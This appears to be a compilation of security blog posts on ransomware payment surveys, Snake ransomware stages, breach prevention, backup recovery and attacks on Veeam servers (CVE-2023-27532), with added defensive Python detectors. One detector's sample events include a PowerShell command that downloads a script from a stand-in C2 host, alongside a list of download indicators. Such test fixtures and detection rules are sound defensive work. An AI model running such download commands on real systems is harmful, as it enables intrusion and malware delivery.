
Cohesity Research Shows That Most Firms Break Their "Do Not Pay" Policies by Paying Millions in Ransoms

 

While a "do not pay" ransomware policy may sound appealing in theory, thwarting attackers' demand for ransom in exchange for stolen data is easier said than done. A recent study conducted by Cohesity, a leader in AI-powered data security management, reveals this truth.

The study surveyed over 900 IT and security decision makers who take a "when, not if" approach to cyberattacks on their business. According to the study, 94% of participants stated that their organisation would pay a ransom to retrieve data and resume commercial operations, with 5% responding, "Maybe, depending on the ransom amount."

The majority of those surveyed had paid a ransom in the previous two years, and the vast majority predicted that the threat of cyberattacks will increase dramatically by 2024. Worryingly, 79% of respondents reported that their firm has been the victim of a ransomware assault between June and December 2023. As a result, 96% of respondents believe the threat of cyberattacks to their industry would increase this year, with 71% expecting it to increase by more than 50%. 

9 out of 10 companies paid ransom 

Sixty-seven percent of respondents stated their organisation would be prepared to pay more than $3 million to retrieve data and restore business processes, while 35% were willing to pay $5 million as ransom. The study also demonstrated the need to be able to respond and recover, as 9 in 10 respondents indicated their organisation had paid a ransom in the previous two years, despite 84% claiming their company had a "do not pay" policy.

"Organisations can't control the increasing volume, frequency, or sophistication of cyberattacks such as ransomware," explained Brian Spanswick, Cohesity's chief information security officer and head of IT. "What they can control is their cyber resilience, which is the ability to respond quickly and recover."

Expanding ransomware tactics

Since every ransomware incident is unique, the decision whether or not to pay a ransom is best made together with law enforcement or the company's cyber insurance provider. Meanwhile, each ransomware attack appears to be becoming more sophisticated and intense as the attack surface keeps expanding.

Delinea, a privileged access management (PAM) company, stated in its annual State of Ransomware report that the growing quantity and frequency of ransomware assaults indicate a shift in attackers' strategy. 

According to Delinea, new tactics that use "stealth" to exfiltrate sensitive and private data have supplanted the tried and tested approach of crippling a business and holding it hostage. To that end, hackers usually threaten either to exploit the data to secure an attractive cyber insurance payout or to sell it to the highest bidder on the darknet.

Remember that internal as well as external sources can pose a threat to an organisation's cybersecurity. 90% of respondents stated that insider threats are as difficult as, or more difficult than, external attacks to identify and prevent, as the Securonix 2024 Insider Threat Report attests.

Defending Against Snake Ransomware: Here's All You Need to Know

 

A snake is not just a carnivorous reptile that poses a physical threat; it can also refer to a malicious software known as ransomware, capable of causing significant harm to your computer system. Similar to its namesake, this ransomware silently infiltrates your applications and contaminates your data.

If your data holds even a modicum of value, you could potentially fall victim to Snake ransomware. These cybercriminals are actively seeking their next target. So, how can you safeguard yourself from their clutches?

Snake ransomware is a hacking technique employed by cybercriminals to gain unauthorized remote access to your system and encrypt your data. Remarkably, your device continues to function normally during the infection, providing no indication of compromise. Subsequently, the intruder makes demands in exchange for data restoration. Snake ransomware primarily targets enterprises and is written in the open-source programming language Go (Golang).

Snake ransomware is notorious for its stealthy operations. While all the technical components of your system may appear to be functioning as usual, malicious actors have surreptitiously tainted them with malware. To successfully execute their attack, threat actors employ the following steps:

1. Gaining Remote Access: Hackers use various methods to gain unauthorized access to systems. With Snake ransomware, they specifically exploit weaknesses in Remote Desktop Protocol (RDP) connections, the feature that lets users reach a machine's desktop over the network. Although RDP enables network-level authentication (NLA) by default to bolster security, attackers identify and exploit its weaknesses, often employing eavesdropping attacks to intercept and manipulate communication.

2. Registering a Signature: Once inside the system, the attacker assesses whether Snake ransomware has already infected it by checking for a mutual exclusion object (mutex) named EKANS (a reversed spelling of "snake"). Only one instance of Snake ransomware can exist on a system at a time. If the check reveals an existing infection, the intruder aborts their mission; otherwise, they proceed.

3. Modifying Firewall Settings: Firewalls play a critical role in monitoring incoming and outgoing network traffic to detect malicious vectors. To ensure the Snake ransomware remains undetected and unhindered, hackers manipulate firewall settings to align with their objectives. This involves configuring the firewall to block any traffic or communication that does not conform to the newly established settings, effectively isolating the system.

4. Deleting Backups: The success of a Snake ransomware attack hinges on the victim's inability to recover data from backups. Consequently, the threat actor meticulously searches for and deletes all data backups within the system. If a data recovery system is in place, the criminal alters its settings to render it inactive, often going unnoticed by the victim.

5. Disrupting Automated Processes: Snake ransomware disrupts both manual and automated processes to exert pressure on the victim and force compliance. This disruption can lead to a complete halt of operations, leaving the victim with no control over critical processes.

6. Encrypting Files: The final stage of a Snake ransomware attack involves encrypting files while they remain on the victim's system. Notably, files in the operating system are exempt from encryption, allowing the victim to log in and perform regular activities without realizing their system is under attack. Post-encryption, Snake ransomware renames these files.
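The renaming in step 6 is also the stage that is observable from outside the malware: a single process changing the extension of many files within a few seconds is a pattern a file-activity monitor can flag before a whole share is encrypted. The detector below is an added example written for this page, not code from the original post or from any analysis of Snake itself; the event shape, the process names, the `.locked` extension and the window/threshold values are all constructed assumptions and should be tuned to your own baseline.

```python
"""Detecting the mass-rename stage of a ransomware run from file-activity
events. Added example for this page; the event shape, process names,
extension and tuning values are constructed assumptions."""
from __future__ import annotations

import ntpath
from collections import Counter, defaultdict, deque

# Tuning values are constructed for the example; tune to your own baseline.
WINDOW_SECONDS = 10.0   # sliding window per process
RENAME_THRESHOLD = 20   # distinct files renamed to a new extension within the window


def extension(path: str) -> str:
    """Lower-cased final extension of a Windows path ('' if none)."""
    return ntpath.splitext(path)[1].lower()


def detect_rename_bursts(events: list[dict], window: float = WINDOW_SECONDS,
                         threshold: int = RENAME_THRESHOLD) -> list[dict]:
    """Return one alert per process that renames at least `threshold` distinct
    files to a different extension within any `window` seconds.

    Only 'rename' events whose extension actually changes are counted, so an
    editor saving over its own temporary file does not accumulate."""
    recent: dict[str, deque] = defaultdict(deque)  # process -> queue of (ts, dst)
    alerted: set[str] = set()
    alerts: list[dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["op"] != "rename" or extension(ev["src"]) == extension(ev["dst"]):
            continue
        q = recent[ev["process"]]
        q.append((ev["ts"], ev["dst"]))
        while q and ev["ts"] - q[0][0] > window:   # drop events outside the window
            q.popleft()
        if ev["process"] in alerted:
            continue
        distinct = {dst for _, dst in q}
        if len(distinct) >= threshold:
            new_ext = Counter(extension(dst) for dst in distinct).most_common(1)[0][0]
            alerts.append({"process": ev["process"], "first_seen": q[0][0],
                           "last_seen": ev["ts"], "count": len(distinct),
                           "new_extension": new_ext})
            alerted.add(ev["process"])
    return alerts


def build_sample_events() -> list[dict]:
    """Constructed file-activity events: a benign editor plus one burst."""
    events: list[dict] = []
    for i in range(3):   # benign: editor renames a few temp files back to documents
        events.append({"ts": 100.0 + i, "process": "winword.exe", "op": "rename",
                       "src": rf"C:\Users\alice\Documents\~tmp{i}.tmp",
                       "dst": rf"C:\Users\alice\Documents\report{i}.docx"})
    for i in range(40):  # constructed burst: 40 spreadsheets renamed in 4 seconds
        events.append({"ts": 200.0 + i * 0.1, "process": "unknown.exe", "op": "rename",
                       "src": rf"D:\Shares\finance\q{i}.xlsx",
                       "dst": rf"D:\Shares\finance\q{i}.xlsx.locked"})
    events.append({"ts": 204.5, "process": "unknown.exe", "op": "write",   # ignored: not a rename
                   "src": r"D:\Shares\finance\README.txt",
                   "dst": r"D:\Shares\finance\README.txt"})
    return events


if __name__ == "__main__":
    for alert in detect_rename_bursts(build_sample_events()):
        print(alert)
```

The alert fires on the twentieth distinct rename, so on the constructed burst it reports `unknown.exe` with `count` 20 and `new_extension` `.locked` while the editor's three renames never reach the threshold. In production the same logic would run against your EDR's or file server's audit events, and the response (isolating the host, suspending the process) would follow from the alert rather than from the encryption being noticed afterwards.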

Preventing Snake Ransomware

Preventing Snake ransomware is most effective when potential attackers are unable to operate with administrator privileges. Here are steps to shield your system:

1. Deactivate Remote Desktop Protocol: Disabling RDP significantly reduces the risk of an intruder accessing your system with Snake ransomware. If RDP is necessary, enforce robust security practices such as preventing third-party access, implementing smart card authentication, and adopting a defense-in-depth approach to secure all layers of your application.

2. Exercise Caution with Attachments and Links: Even with RDP deactivated, remain vigilant as perpetrators may send malware-infected attachments or links to gain remote access when opened. Consider installing antivirus software to detect and neutralize potential threats.

3. Monitor Network Activities: Snake ransomware operates covertly, making it essential to monitor network activities with automated threat monitoring tools. These tools work continuously to analyze network traffic and detect unusual behavior that might evade manual detection.

4. Back Up Data on Separate Devices: Storing data backups on the same system offers limited protection during a ransomware attack. Instead, implement and maintain backups in separate, unconnected locations. Consider offline storage for added security.

5. Beware of Unfamiliar Apps: Intruders frequently employ malicious software to execute cyberattacks. To safeguard your system, use threat detection systems to periodically scan your applications for unfamiliar tools. Effective detection tools not only identify such software but also contain their operations.

Snake ransomware operates stealthily and encrypts your data, rendering it inaccessible without the decryption key. To avoid reaching this critical point, prioritize proactive security measures, employ robust defenses, and cultivate a security-conscious culture to thwart Snake ransomware's attempts to infiltrate and compromise your system.

Safeguarding Your Data: 10 Best Practices to Prevent a Data Breach

 

Data breaches have become a significant concern for organizations and individuals alike, as cyber threats continue to evolve in complexity and scale. The consequences of a data breach can be severe, ranging from financial loss and reputational damage to legal implications. It is crucial for businesses to implement robust preventive measures to protect their valuable data and maintain customer trust. Here are some best practices and tactics to prevent a data breach.

1. Develop a comprehensive security strategy: Establish a well-defined security plan that includes policies, procedures, and guidelines for data protection. Regularly review and update this strategy to adapt to evolving threats.

2. Educate and train employees: Human error is a leading cause of data breaches. Conduct regular training sessions to educate employees on data security practices, such as strong password management, recognizing phishing attempts, and handling sensitive data appropriately.

3. Implement strong access controls: Limit access to sensitive data and ensure that access rights are granted on a need-to-know basis. Regularly review and update user permissions as employees change roles or leave the organization.

4. Encrypt sensitive data: Utilize encryption techniques to protect data both at rest and in transit. Encryption adds an extra layer of security, making it difficult for unauthorized individuals to access and interpret the data.

5. Regularly patch and update systems: Keep all software, operating systems, and applications up to date with the latest security patches. Vulnerabilities in outdated software can be exploited by attackers to gain unauthorized access.

6. Use multi-factor authentication (MFA): Implement MFA for accessing critical systems and sensitive data. MFA adds an extra layer of authentication, making it harder for attackers to gain unauthorized access even if passwords are compromised.

7. Conduct regular security assessments: Perform comprehensive security assessments, including vulnerability scans and penetration testing, to identify potential weaknesses and address them proactively.

8. Implement data backup and recovery procedures: Regularly back up critical data and test the restoration process. In the event of a breach, having reliable backups can help restore systems and minimize downtime.

9. Monitor network and system activity: Employ intrusion detection and prevention systems, as well as log monitoring and analysis tools, to identify and respond to suspicious activity promptly.

10. Establish an incident response plan: Develop a well-defined incident response plan that outlines the steps to be taken in the event of a data breach. This plan should include communication strategies, containment measures, and coordination with relevant stakeholders.

By following these best practices, organizations can significantly reduce the risk of a data breach and protect sensitive information. However, it's essential to stay informed about emerging threats, industry best practices, and regulatory requirements to ensure ongoing data security. Remember, prevention is key when it comes to data breaches, and a proactive approach can save you from costly and damaging repercussions.


Backups can be Quicker and Less Expensive than Paying the Ransom

 

Ransomware operators want to spend as little time as possible within your systems, which means the encryption they use is shoddy and frequently corrupts your data. 

As a result, paying ransoms is typically a more expensive chore than simply refusing to pay and working from your own backups. That is the perspective of Richard Addiscott, a senior director analyst at Gartner.

"They encrypt at an extremely fast rate," he said on Monday at the firm's IT Infrastructure, Operations, and Cloud Strategies Conference 2023 in Sydney. "They encrypt faster than you can run a directory listing."

Because ransomware creators favour speed over care, their encryption routines corrupt some of the data they later try to sell back to you. Even when operators hand over everything they claim to have, Addiscott said, restoring from corrupted data dumps delivered by criminals is not simple. Many operators do not hand over everything; instead, they open a new round of negotiations, demanding a further ransom for additional releases.

According to him, just 4% of ransomware victims actually manage to get all of their data back, and only 61% retrieve any data at all. Additionally, the average disruption to a victim's business is 25 days.

Addiscott proposed that organisations design and practise ransomware recovery playbooks to shorten that disruption. Securing funding to prepare for a speedy post-ransomware recovery requires couching the risk in business terms rather than IT terms.

According to Addiscott, the themes most likely to loosen the purse strings are revenue protection, risk reduction, and cost control. He shook his head, though, as he recalled instances in which business leaders authorised enormous and speedy ransom payments that dwarfed the previously denied investments that might have rendered those payments unnecessary.

He advised good preparation because ransomware crooks have figured out one technique to speed up stalled payment negotiations: whacking their victims with a DDoS attack, so they're battling two fires at once, and are thus willing to pay to make at least one problem go away. 

Ransomware operators also like to double-dip by demanding payment from the organisations whose data they have stolen, then mining the data to locate new targets. Addiscott mentioned an attack on a healthcare provider in which clients were confronted with a demand for payment, failing which their medical records would be revealed.

Customers identified in stolen data may also be contacted and urged to press the breached supplier to pay, so as to reduce the risk of their own records being disclosed. Immutable backups and an isolated recovery environment, according to Addiscott, are a good combination of defences.
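Immutable backups only help if you can tell, before a restore, that the copy is still the one you made. The example below is added here and is not taken from the Gartner talk or from any backup vendor's tooling: it hashes a backup set into a manifest, keeps the manifest apart from the data (standing in for the isolated recovery environment), and later reports which files were modified, deleted or added. It serves this passage as well as the backup advice in the Snake post (back up to separate, unconnected locations) and item 8 of the best-practice list (back up and test restoration). All paths, file contents and the tampering performed in `run_demo` are constructed fixtures.

```python
"""Verifying an offline/immutable backup copy against a separately stored
hash manifest before trusting it for recovery. Added example; paths and
file contents are constructed fixtures."""
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large backup images fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every file under root (POSIX-style relative path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_backup(root: Path, manifest: dict[str, str]) -> dict[str, list[str]]:
    """Compare the current state of root with the manifest taken at backup time."""
    current = build_manifest(root)
    report: dict[str, list[str]] = {"ok": [], "modified": [], "missing": [], "unexpected": []}
    for rel, digest in manifest.items():
        if rel not in current:
            report["missing"].append(rel)
        elif current[rel] != digest:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    report["unexpected"] = sorted(set(current) - set(manifest))
    return report


def run_demo() -> dict[str, list[str]]:
    """Build a constructed backup set, record its manifest, tamper with the set
    in the ways the posts above describe (a file altered, one deleted, one added),
    and return the verification report."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = Path(tmp) / "backup"
        (backup / "db").mkdir(parents=True)
        (backup / "db" / "customers.bak").write_bytes(b"constructed database dump\n")
        (backup / "config.json").write_text('{"site": "example"}\n')
        (backup / "notes.txt").write_text("constructed file\n")

        # The manifest belongs in the isolated recovery environment, not on the
        # backup share itself; a sibling directory stands in for it here.
        vault = Path(tmp) / "recovery-vault"
        vault.mkdir()
        (vault / "manifest.json").write_text(json.dumps(build_manifest(backup), indent=2))

        # Constructed tampering: one file overwritten, one deleted, one note added.
        (backup / "db" / "customers.bak").write_bytes(b"\x00garbage\x00")
        (backup / "notes.txt").unlink()
        (backup / "RESTORE_INSTRUCTIONS.txt").write_text("constructed note\n")

        stored = json.loads((vault / "manifest.json").read_text())
        return verify_backup(backup, stored)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The manifest is only as trustworthy as its storage: if it sits beside the backups on a writable share, an intruder who rewrites the data can rewrite the manifest too, which is exactly why the copy used for verification should live in the isolated environment or on immutable storage. Hash verification also does not replace a restore test; it tells you the copy is intact, while a practised playbook tells you how long bringing it back will take.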

However, he also stated that the people behind ransomware are brilliant, vicious, inventive, and relentless, so they will find new and even more nefarious ways to strike. 

The analyst did have one piece of good news: there was a 21% decrease in ransomware attacks in 2022 compared to 2021. He hypothesised that the decline was caused by sanctions making it more difficult for Russian-based ransomware groups to operate.

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and other cyberattacks. 

There is evidence that at least one group of threat actors, who have been associated with several high-profile ransomware gangs, are targeting Veeam backup servers. 

Starting from March 28th, there have been reported incidents of malicious activity and tools similar to FIN7 attacks being used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software. 

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The software vendor addressed the vulnerability on March 7 and offered instructions for implementing workarounds. However, on March 23, a pentesting company named Horizon3 released an exploit for CVE-2023-27532, which showed how the credentials could be extracted in plain text using an unsecured API endpoint. 

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers deduced that the attacker exploited the CVE-2023-27532 vulnerability, given the timing of the campaign, the presence of open TCP port 9401 on compromised servers, and the vulnerable version of VBR running on the affected hosts. 

During a threat hunt exercise using telemetry data from WithSecure's Endpoint Detection and Response (EDR), the researchers discovered Veeam servers generating suspicious alerts such as sqlservr.exe spawning cmd.exe and downloading PowerShell scripts.
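The process chain WithSecure describes, the database engine on a backup server launching a shell that then pulls down PowerShell, is a precise thing to hunt for in process-creation telemetry. The detector below is an added example for this page, not WithSecure's or Veeam's code; the event layout, host name, executable paths, URL (`example.invalid`) and command lines are constructed, and the download indicators are ordinary substrings a defender would look for, not a complete signature.

```python
"""Flagging the process chain observed on compromised Veeam hosts: the SQL
Server engine (sqlservr.exe) spawning a shell, and that shell fetching
PowerShell over the network. Added example; the event format, host names,
URL and command lines are constructed, not real telemetry."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# On a VBR host the database engine has no legitimate reason to launch a shell.
SUSPICIOUS_PARENTS = {"sqlservr.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line fragments that show content being pulled from the network.
DOWNLOAD_INDICATORS = ("invoke-webrequest", "iwr ", "downloadstring",
                       "downloadfile", "http://", "https://")


@dataclass
class Alert:
    host: str
    ts: str
    parent: str
    image: str
    severity: str
    reason: str


def basename(image_path: str) -> str:
    """Executable name only, lower-cased, from a Windows path."""
    return ntpath.basename(image_path).lower()


def evaluate_event(event: dict) -> Alert | None:
    """Return an Alert for a sqlservr.exe -> shell chain, else None.
    Severity is raised when the shell's command line fetches from the network."""
    parent, image = basename(event["parent"]), basename(event["image"])
    if parent not in SUSPICIOUS_PARENTS or image not in SHELLS:
        return None
    cmd = event.get("cmdline", "").lower()
    downloads = any(ind in cmd for ind in DOWNLOAD_INDICATORS)
    reason = f"{parent} spawned {image}"
    if downloads:
        reason += " with a network download in its command line"
    return Alert(event["host"], event["ts"], parent, image,
                 "high" if downloads else "medium", reason)


def scan(events: list[dict]) -> list[Alert]:
    """Run every event through the rule and keep the hits, in input order."""
    return [a for a in map(evaluate_event, events) if a is not None]


# Constructed process-creation events in a simplified EDR shape.
SQL_PATH = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = [
    {"ts": "2023-03-29T02:14:07Z", "host": "vbr01.example.invalid",
     "parent": SQL_PATH, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c powershell -NoProfile -Command "Invoke-WebRequest http://c2.example.invalid/a.ps1 -OutFile C:\Windows\Temp\a.ps1"'},
    {"ts": "2023-03-29T02:14:09Z", "host": "vbr01.example.invalid",
     "parent": SQL_PATH, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ver"},
    {"ts": "2023-03-29T02:20:00Z", "host": "vbr01.example.invalid",   # benign: user shell
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe"},
    {"ts": "2023-03-29T02:21:00Z", "host": "vbr01.example.invalid",   # benign: service start
     "parent": r"C:\Windows\System32\services.exe", "image": SQL_PATH,
     "cmdline": r'"sqlservr.exe"'},
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert.severity.upper(), alert.ts, alert.host, alert.reason)
```

On the constructed events the rule returns two alerts, a high-severity one for the download and a medium one for the bare shell, and stays quiet for the user's own shell and the service starting SQL Server. A complementary hunt, given the same report's note about TCP port 9401, is an inventory of which hosts expose that port beyond trusted networks.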

The underlying problem is that some organizations set up their Veeam backup servers with insecure configurations that leave them reachable from the Internet. Hackers can then exploit these weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.